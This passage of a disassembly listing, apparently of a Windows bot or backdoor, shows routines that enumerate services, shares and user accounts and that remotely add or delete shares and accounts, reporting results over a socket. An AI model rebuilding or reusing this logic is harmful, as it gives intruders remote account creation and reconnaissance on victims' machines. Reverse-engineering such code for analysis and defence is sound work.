cmp [ebp+ServicesReturned], ebx
jle loc_40E638
lea esi, [ebp+Services.lpDisplayName]
loc_40E59B: ; CODE XREF: sub_40E518+11A�j
mov eax, [esi+8]
dec eax
jz short loc_40E5E7
dec eax
jz short loc_40E5E0
dec eax
jz short loc_40E5D9
dec eax
jz short loc_40E5D2
dec eax
jz short loc_40E5CB
dec eax
jz short loc_40E5C4
dec eax
lea eax, [ebp+var_20]
jz short loc_40E5BD
push 430DD0h
jmp short loc_40E5EF
; ---------------------------------------------------------------------------
loc_40E5BD: ; CODE XREF: sub_40E518+9C�j
push 430DC4h
jmp short loc_40E5EF
; ---------------------------------------------------------------------------
loc_40E5C4: ; CODE XREF: sub_40E518+96�j
push 430DB8h
jmp short loc_40E5EC
; ---------------------------------------------------------------------------
loc_40E5CB: ; CODE XREF: sub_40E518+93�j
push 430DACh
jmp short loc_40E5EC
; ---------------------------------------------------------------------------
loc_40E5D2: ; CODE XREF: sub_40E518+90�j
push 430DA0h
jmp short loc_40E5EC
; ---------------------------------------------------------------------------
loc_40E5D9: ; CODE XREF: sub_40E518+8D�j
push 430D94h
jmp short loc_40E5EC
; ---------------------------------------------------------------------------
loc_40E5E0: ; CODE XREF: sub_40E518+8A�j
push 430D88h
jmp short loc_40E5EC
; ---------------------------------------------------------------------------
loc_40E5E7: ; CODE XREF: sub_40E518+87�j
push 430D7Ch
loc_40E5EC: ; CODE XREF: sub_40E518+B1�j
; sub_40E518+B8�j ...
lea eax, [ebp+var_20]
loc_40E5EF: ; CODE XREF: sub_40E518+A3�j
; sub_40E518+AA�j
push eax
call sub_41795B
pop ecx
lea eax, [ebp+var_20]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push 430D70h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_38C]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+ServicesReturned]
jl loc_40E59B
loc_40E638: ; CODE XREF: sub_40E518+77�j
cmp [ebp+ResumeHandle], ebx
jnz loc_40E550
loc_40E641: ; CODE XREF: sub_40E518+6C�j
push [ebp+hSCObject] ; hSCObject
call CloseServiceHandle ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+ServicesReturned]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_40E518 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E658 proc near ; CODE XREF: sub_40FCA3:loc_411E58�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_40E6F1
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40E681
dec eax
jnz short loc_40E6D1
push edi ; int
push 0 ; lpMultiByteStr
call sub_40E82A
pop ecx
pop ecx
jmp short loc_40E6CD
; ---------------------------------------------------------------------------
loc_40E681: ; CODE XREF: sub_40E658+18�j
cmp [ebp+arg_8], 0
jnz short loc_40E6BF
push 24h
push edi
call sub_419690
pop ecx
test eax, eax
pop ecx
jnz short loc_40E6BF
push 57h
pop eax
loc_40E698: ; CODE XREF: sub_40E658+77�j
push eax
call sub_40EFF8
push eax
lea eax, [esi+esi*2]
push edi
mov esi, 44A4E0h
push dword ptr unk_430758[eax*4]
push 430E74h
push esi
call sub_41795B
add esp, 18h
jmp short loc_40E711
; ---------------------------------------------------------------------------
loc_40E6BF: ; CODE XREF: sub_40E658+2D�j
; sub_40E658+3B�j
push [ebp+arg_8] ; int
push edi ; int
push 0 ; lpMultiByteStr
call sub_40E77E
add esp, 0Ch
loc_40E6CD: ; CODE XREF: sub_40E658+27�j
test eax, eax
jnz short loc_40E698
loc_40E6D1: ; CODE XREF: sub_40E658+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, 44A4E0h
push dword ptr unk_43075C[eax*4]
push 430E44h
push esi
call sub_41795B
add esp, 10h
jmp short loc_40E711
; ---------------------------------------------------------------------------
loc_40E6F1: ; CODE XREF: sub_40E658+A�j
mov eax, [ebp+arg_0]
mov esi, 44A4E0h
lea eax, [eax+eax*2]
push dword ptr unk_430758[eax*4]
push 430E0Ch
push esi
call sub_41795B
add esp, 0Ch
loc_40E711: ; CODE XREF: sub_40E658+65�j
; sub_40E658+97�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_40E658 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40E717(LPCWSTR lpWideCharStr)
sub_40E717 proc near ; CODE XREF: sub_416B27+247�p
lpWideCharStr = dword ptr 4
push esi
xor esi, esi
cmp [esp+4+lpWideCharStr], esi
jnz short loc_40E724
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40E724: ; CODE XREF: sub_40E717+7�j
push ebx
push ebp
push edi
push esi ; lpUsedDefaultChar
push esi ; lpDefaultChar
push esi ; cbMultiByte
mov edi, WideCharToMultiByte
push esi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
mov ebx, 400h
push [esp+24h+lpWideCharStr] ; lpWideCharStr
push ebx ; dwFlags
push esi ; CodePage
call edi ; WideCharToMultiByte
test byte_445EDC+4804h, 1
mov ebp, eax
jnz short loc_40E761
or byte_445EDC+4804h, 1
lea eax, [ebp+1]
push eax
call sub_418BE5
pop ecx
mov dword ptr byte_445EDC+459Ch, eax
loc_40E761: ; CODE XREF: sub_40E717+32�j
push esi ; lpUsedDefaultChar
push esi ; lpDefaultChar
push ebp ; cbMultiByte
push dword ptr byte_445EDC+459Ch ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [esp+24h+lpWideCharStr] ; lpWideCharStr
push ebx ; dwFlags
push esi ; CodePage
call edi ; WideCharToMultiByte
mov eax, dword ptr byte_445EDC+459Ch
pop edi
pop ebp
pop ebx
pop esi
retn
sub_40E717 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E77E(DWORD lpMultiByteStr, int, int)
sub_40E77E proc near ; CODE XREF: sub_40E658+6D�p
; sub_416E4D+18E�p ...
buf = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
lpMultiByteStr = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+lpMultiByteStr] ; lpMultiByteStr
call sub_40E7E9
push [ebp+arg_4] ; lpMultiByteStr
mov edi, eax
call sub_40E7E9
push 24h
mov dword ptr [ebp+buf], eax
push [ebp+arg_4]
call sub_419690
push [ebp+arg_8] ; lpMultiByteStr
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_40E7E9
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+lpMultiByteStr]
push eax ; parm_err
lea eax, [ebp+buf]
push eax ; buf
push 2 ; level
push edi ; servername
call NetShareAdd
pop edi
leave
retn
sub_40E77E endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40E7E9(LPCSTR lpMultiByteStr)
sub_40E7E9 proc near ; CODE XREF: sub_40E77E+A�p
; sub_40E77E+14�p ...
lpMultiByteStr = dword ptr 4
push ebp
mov ebp, [esp+4+lpMultiByteStr]
xor eax, eax
cmp ebp, eax
jnz short loc_40E7F6
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40E7F6: ; CODE XREF: sub_40E7E9+9�j
push ebx
push esi
mov esi, MultiByteToWideChar
push edi
push eax ; cchWideChar
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push ebp ; lpMultiByteStr
push 1 ; dwFlags
push eax ; CodePage
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_418BE5
pop ecx
mov ebx, eax
push edi ; cchWideChar
push ebx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push ebp ; lpMultiByteStr
push 1 ; dwFlags
push 0 ; CodePage
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_40E7E9 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40E82A(LPCSTR lpMultiByteStr, int)
sub_40E82A proc near ; CODE XREF: sub_40E658+20�p
; sub_416B27+1BC�p ...
lpMultiByteStr = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+lpMultiByteStr] ; lpMultiByteStr
call sub_40E7E9
push [esp+8+arg_4] ; lpMultiByteStr
mov esi, eax
call sub_40E7E9
pop ecx
pop ecx
push 0 ; reserved
push eax ; netname
push esi ; servername
call NetShareDel
pop esi
retn
sub_40E82A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E84D(SOCKET s, int, int, DWORD lpMultiByteStr)
sub_40E84D proc near ; CODE XREF: sub_40FCA3+21E1�p
var_210 = dword ptr -210h
resume_handle = dword ptr -10h
servername = dword ptr -0Ch
totalentries = dword ptr -8
Buffer = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
lpMultiByteStr = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+lpMultiByteStr] ; lpMultiByteStr
call sub_40E7E9
xor esi, esi
mov [ebp+servername], eax
push esi ; int
mov [ebp+lpMultiByteStr], esi
push [ebp+arg_8] ; int
mov [ebp+totalentries], esi
mov [ebp+resume_handle], esi
push 430F08h ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 18h
loc_40E886: ; CODE XREF: sub_40E84D+10F�j
lea eax, [ebp+resume_handle]
push eax ; resume_handle
lea eax, [ebp+totalentries]
push eax ; totalentries
lea eax, [ebp+lpMultiByteStr]
push eax ; entriesread
lea eax, [ebp+Buffer]
push 0FFFFFFFFh ; prefmaxlen
push eax ; bufptr
push 1F6h ; level
push [ebp+servername] ; servername
call NetShareEnum
mov ebx, eax
cmp ebx, esi
jz short loc_40E8E9
cmp ebx, 0EAh
jz short loc_40E8E9
push ebx
push ebx
call sub_40EFF8
pop ecx
push eax
lea eax, [ebp+var_210]
push 430ED0h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_210]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 24h
jmp short loc_40E956
; ---------------------------------------------------------------------------
loc_40E8E9: ; CODE XREF: sub_40E84D+5D�j
; sub_40E84D+65�j
xor edi, edi
inc edi
cmp [ebp+lpMultiByteStr], edi
jb short loc_40E94D
mov eax, [ebp+Buffer]
lea esi, [eax+14h]
loc_40E8F7: ; CODE XREF: sub_40E84D+FC�j
push dword ptr [esi+10h] ; pSecurityDescriptor
call IsValidSecurityDescriptor ; IsValidSecurityDescriptor
test eax, eax
mov eax, 430ECCh
jnz short loc_40E90E
mov eax, 430EC8h
loc_40E90E: ; CODE XREF: sub_40E84D+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push 430EB0h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_210]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+lpMultiByteStr]
jbe short loc_40E8F7
xor esi, esi
loc_40E94D: ; CODE XREF: sub_40E84D+A2�j
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
loc_40E956: ; CODE XREF: sub_40E84D+9A�j
cmp ebx, 0EAh
jz loc_40E886
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40E84D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E96E(int, int, int, SOCKET s, int, int)
sub_40E96E proc near ; CODE XREF: sub_40FCA3:loc_411EF4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
s = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_40EA12
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_40E9B0
dec eax
jz short loc_40E9A5
dec eax
jnz short loc_40E9CB
push [ebp+arg_14] ; int
push [ebp+arg_10] ; int
push [ebp+s] ; s
push ebx ; int
push edi ; lpMultiByteStr
call sub_40EAB4
add esp, 14h
jmp short loc_40E9C7
; ---------------------------------------------------------------------------
loc_40E9A5: ; CODE XREF: sub_40E96E+1D�j
push ebx ; int
push edi ; lpMultiByteStr
call sub_40EA93
pop ecx
pop ecx
jmp short loc_40E9C7
; ---------------------------------------------------------------------------
loc_40E9B0: ; CODE XREF: sub_40E96E+1A�j
cmp [ebp+arg_8], edi
jz short loc_40E9C4
push [ebp+arg_8] ; int
push ebx ; int
push edi ; lpMultiByteStr
call sub_40EA39
add esp, 0Ch
jmp short loc_40E9C7
; ---------------------------------------------------------------------------
loc_40E9C4: ; CODE XREF: sub_40E96E+45�j
push 57h
pop eax
loc_40E9C7: ; CODE XREF: sub_40E96E+35�j
; sub_40E96E+40�j ...
cmp eax, edi
jnz short loc_40E9EB
loc_40E9CB: ; CODE XREF: sub_40E96E+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, 44A6E8h
push dword ptr unk_43075C[eax*4]
push 430FB8h
push esi
call sub_41795B
add esp, 10h
jmp short loc_40EA32
; ---------------------------------------------------------------------------
loc_40E9EB: ; CODE XREF: sub_40E96E+5B�j
push eax
call sub_40EFF8
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, 44A6E8h
push dword ptr unk_430758[eax*4]
push 430F78h
push esi
call sub_41795B
add esp, 18h
jmp short loc_40EA32
; ---------------------------------------------------------------------------
loc_40EA12: ; CODE XREF: sub_40E96E+D�j
mov eax, [ebp+arg_0]
mov esi, 44A6E8h
lea eax, [eax+eax*2]
push dword ptr unk_430758[eax*4]
push 430F40h
push esi
call sub_41795B
add esp, 0Ch
loc_40EA32: ; CODE XREF: sub_40E96E+7B�j
; sub_40E96E+A2�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40E96E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40EA39(LPCSTR lpMultiByteStr, int, int)
sub_40EA39 proc near ; CODE XREF: sub_40E96E+4C�p
buf = byte ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
parm_err = dword ptr -4
lpMultiByteStr = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+parm_err], 0
push edi
push [ebp+lpMultiByteStr] ; lpMultiByteStr
call sub_40E7E9
push [ebp+arg_4] ; lpMultiByteStr
mov edi, eax
call sub_40E7E9
push [ebp+arg_8] ; lpMultiByteStr
mov dword ptr [ebp+buf], eax
call sub_40E7E9
add esp, 0Ch
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
lea ecx, [ebp+parm_err]
mov [ebp+var_20], eax
xor eax, eax
push ecx ; parm_err
lea ecx, [ebp+buf]
inc eax
push ecx ; buf
push eax ; level
push edi ; servername
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call NetUserAdd
pop edi
leave
retn
sub_40EA39 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40EA93(LPCSTR lpMultiByteStr, int)
sub_40EA93 proc near ; CODE XREF: sub_40E96E+39�p
lpMultiByteStr = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+lpMultiByteStr] ; lpMultiByteStr
call sub_40E7E9
push [esp+8+arg_4] ; lpMultiByteStr
mov esi, eax
call sub_40E7E9
pop ecx
pop ecx
push eax ; username
push esi ; servername
call NetUserDel
pop esi
retn
sub_40EA93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40EAB4(LPCSTR lpMultiByteStr, int, SOCKET s, int, int)
sub_40EAB4 proc near ; CODE XREF: sub_40E96E+2D�p
var_204 = dword ptr -204h
Buffer = dword ptr -4
lpMultiByteStr = dword ptr 8
arg_4 = dword ptr 0Ch
s = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+Buffer], 0
push esi
push [ebp+lpMultiByteStr] ; lpMultiByteStr
call sub_40E7E9
push [ebp+arg_4] ; lpMultiByteStr
mov esi, eax
call sub_40E7E9
pop ecx
pop ecx
lea ecx, [ebp+Buffer]
push ecx ; bufptr
push 0Bh ; level
push eax ; username
push esi ; servername
call NetUserGetInfo
test eax, eax
mov [ebp+lpMultiByteStr], eax
jnz loc_40EE41
mov eax, [ebp+Buffer]
test eax, eax
jz loc_40EE7C
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push 431190h
push eax
call sub_41795B
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+s]
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push 431180h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push 43116Ch
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push 431160h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
add esp, 40h
mov eax, [eax+10h]
sub eax, 0
jz short loc_40EBCD
dec eax
jz short loc_40EBC6
dec eax
jz short loc_40EBBF
mov eax, 4305C8h
jmp short loc_40EBD2
; ---------------------------------------------------------------------------
loc_40EBBF: ; CODE XREF: sub_40EAB4+102�j
mov eax, 431150h
jmp short loc_40EBD2
; ---------------------------------------------------------------------------
loc_40EBC6: ; CODE XREF: sub_40EAB4+FF�j
mov eax, 431148h
jmp short loc_40EBD2
; ---------------------------------------------------------------------------
loc_40EBCD: ; CODE XREF: sub_40EAB4+FC�j
mov eax, 431140h
loc_40EBD2: ; CODE XREF: sub_40EAB4+109�j
; sub_40EAB4+110�j ...
push eax
lea eax, [ebp+var_204]
push 43112Ch
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push 43111Ch
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push 431108h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
push 4310F8h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push 4310E4h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push 4310CCh
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push 4310B4h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push 4310A4h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push 431094h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push 431080h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push 43106Ch
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push 431058h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push 431044h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push 431030h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
mov eax, [ebp+Buffer]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push 43101Ch
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_204]
push esi ; int
push eax ; int
push edi ; int
push ebx ; s
call sub_40E1D6
add esp, 20h
pop edi
pop ebx
jmp short loc_40EE6D
; ---------------------------------------------------------------------------
loc_40EE41: ; CODE XREF: sub_40EAB4+35�j
push eax
lea eax, [ebp+var_204]
push 430FE8h
push eax
call sub_41795B
push 0 ; int
lea eax, [ebp+var_204]
push [ebp+arg_10] ; int
push eax ; int
push [ebp+arg_C] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
loc_40EE6D: ; CODE XREF: sub_40EAB4+38B�j
cmp [ebp+Buffer], 0
jz short loc_40EE7C
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
loc_40EE7C: ; CODE XREF: sub_40EAB4+40�j
; sub_40EAB4+3BD�j
mov eax, [ebp+lpMultiByteStr]
pop esi
leave
retn
sub_40EAB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40EE82(SOCKET s, int, int, DWORD lpMultiByteStr)
sub_40EE82 proc near ; CODE XREF: sub_40FCA3+227D�p
var_218 = dword ptr -218h
totalentries = dword ptr -18h
servername = dword ptr -14h
resume_handle = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
Buffer = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
lpMultiByteStr = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+lpMultiByteStr] ; lpMultiByteStr
mov [ebp+Buffer], esi
call sub_40E7E9
push esi ; int
mov [ebp+servername], eax
push [ebp+arg_8] ; int
mov [ebp+lpMultiByteStr], esi
mov [ebp+totalentries], esi
mov [ebp+resume_handle], esi
push 431234h ; int
mov [ebp+var_8], esi
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 18h
loc_40EEC1: ; CODE XREF: sub_40EE82+12B�j
lea eax, [ebp+resume_handle]
push eax ; resume_handle
lea eax, [ebp+totalentries]
push eax ; totalentries
lea eax, [ebp+lpMultiByteStr]
push eax ; entriesread
lea eax, [ebp+Buffer]
push 0FFFFFFFFh ; prefmaxlen
push eax ; bufptr
push 2 ; filter
push esi ; level
push [ebp+servername] ; servername
call NetUserEnum
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_40EF22
cmp eax, 0EAh
jz short loc_40EF22
push eax
push eax
call sub_40EFF8
pop ecx
push eax
lea eax, [ebp+var_218]
push 4311FCh
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_218]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 24h
jmp short loc_40EF93
; ---------------------------------------------------------------------------
loc_40EF22: ; CODE XREF: sub_40EE82+62�j
; sub_40EE82+69�j
mov edi, [ebp+Buffer]
cmp edi, esi
jz short loc_40EFA6
xor ebx, ebx
cmp [ebp+lpMultiByteStr], esi
jbe short loc_40EF93
loc_40EF30: ; CODE XREF: sub_40EE82+E9�j
cmp edi, esi
lea eax, [ebp+var_218]
jz short loc_40EF6F
push dword ptr [edi]
push 4311F4h
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_218]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+lpMultiByteStr]
jb short loc_40EF30
jmp short loc_40EF93
; ---------------------------------------------------------------------------
loc_40EF6F: ; CODE XREF: sub_40EE82+B6�j
push 4311B4h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_218]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 1Ch
loc_40EF93: ; CODE XREF: sub_40EE82+9E�j
; sub_40EE82+AC�j ...
mov edi, [ebp+Buffer]
cmp edi, esi
jz short loc_40EFA6
push edi ; Buffer
call NetApiBufferFree
xor edi, edi
mov [ebp+Buffer], edi
loc_40EFA6: ; CODE XREF: sub_40EE82+A5�j
; sub_40EE82+116�j
cmp [ebp+var_C], 0EAh
jz loc_40EEC1
cmp edi, esi
jz short loc_40EFBE
push edi ; Buffer
call NetApiBufferFree
loc_40EFBE: ; CODE XREF: sub_40EE82+133�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push 43119Ch
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_218]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40EE82 endp
; =============== S U B R O U T I N E =======================================
sub_40EFF8 proc near ; CODE XREF: sub_40E658+41�p
; sub_40E84D+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_40F0AA
jz loc_40F0A3
cmp eax, 7Bh
ja short loc_40F06F
jz short loc_40F065
cmp eax, 5
jz short loc_40F05B
cmp eax, 8
jz short loc_40F051
cmp eax, 32h
jz short loc_40F047
cmp eax, 35h
jz short loc_40F03D
cmp eax, 57h
jnz loc_40F0F9
push 43150Ch
jmp loc_40F11A
; ---------------------------------------------------------------------------
loc_40F03D: ; CODE XREF: sub_40EFF8+30�j
push 4314F4h
jmp loc_40F11A
; ---------------------------------------------------------------------------
loc_40F047: ; CODE XREF: sub_40EFF8+2B�j
push 4314CCh
jmp loc_40F11A
; ---------------------------------------------------------------------------
loc_40F051: ; CODE XREF: sub_40EFF8+26�j
push 4314B8h
jmp loc_40F11A
; ---------------------------------------------------------------------------
loc_40F05B: ; CODE XREF: sub_40EFF8+21�j
push 4314A8h
jmp loc_40F11A
; ---------------------------------------------------------------------------
loc_40F065: ; CODE XREF: sub_40EFF8+1C�j
push 431490h
jmp loc_40F11A
; ---------------------------------------------------------------------------
loc_40F06F: ; CODE XREF: sub_40EFF8+1A�j
sub eax, 7Ch
jz short loc_40F09C
sub eax, 7C8h
jz short loc_40F095
dec eax
jz short loc_40F08B
dec eax
jnz short loc_40F0F9
push 431478h
jmp loc_40F11A
; ---------------------------------------------------------------------------
loc_40F08B: ; CODE XREF: sub_40EFF8+84�j
push 431454h
jmp loc_40F11A
; ---------------------------------------------------------------------------
loc_40F095: ; CODE XREF: sub_40EFF8+81�j
push 431430h
jmp short loc_40F11A
; ---------------------------------------------------------------------------
loc_40F09C: ; CODE XREF: sub_40EFF8+7A�j
push 431414h
jmp short loc_40F11A
; ---------------------------------------------------------------------------
loc_40F0A3: ; CODE XREF: sub_40EFF8+11�j
push 4313E0h
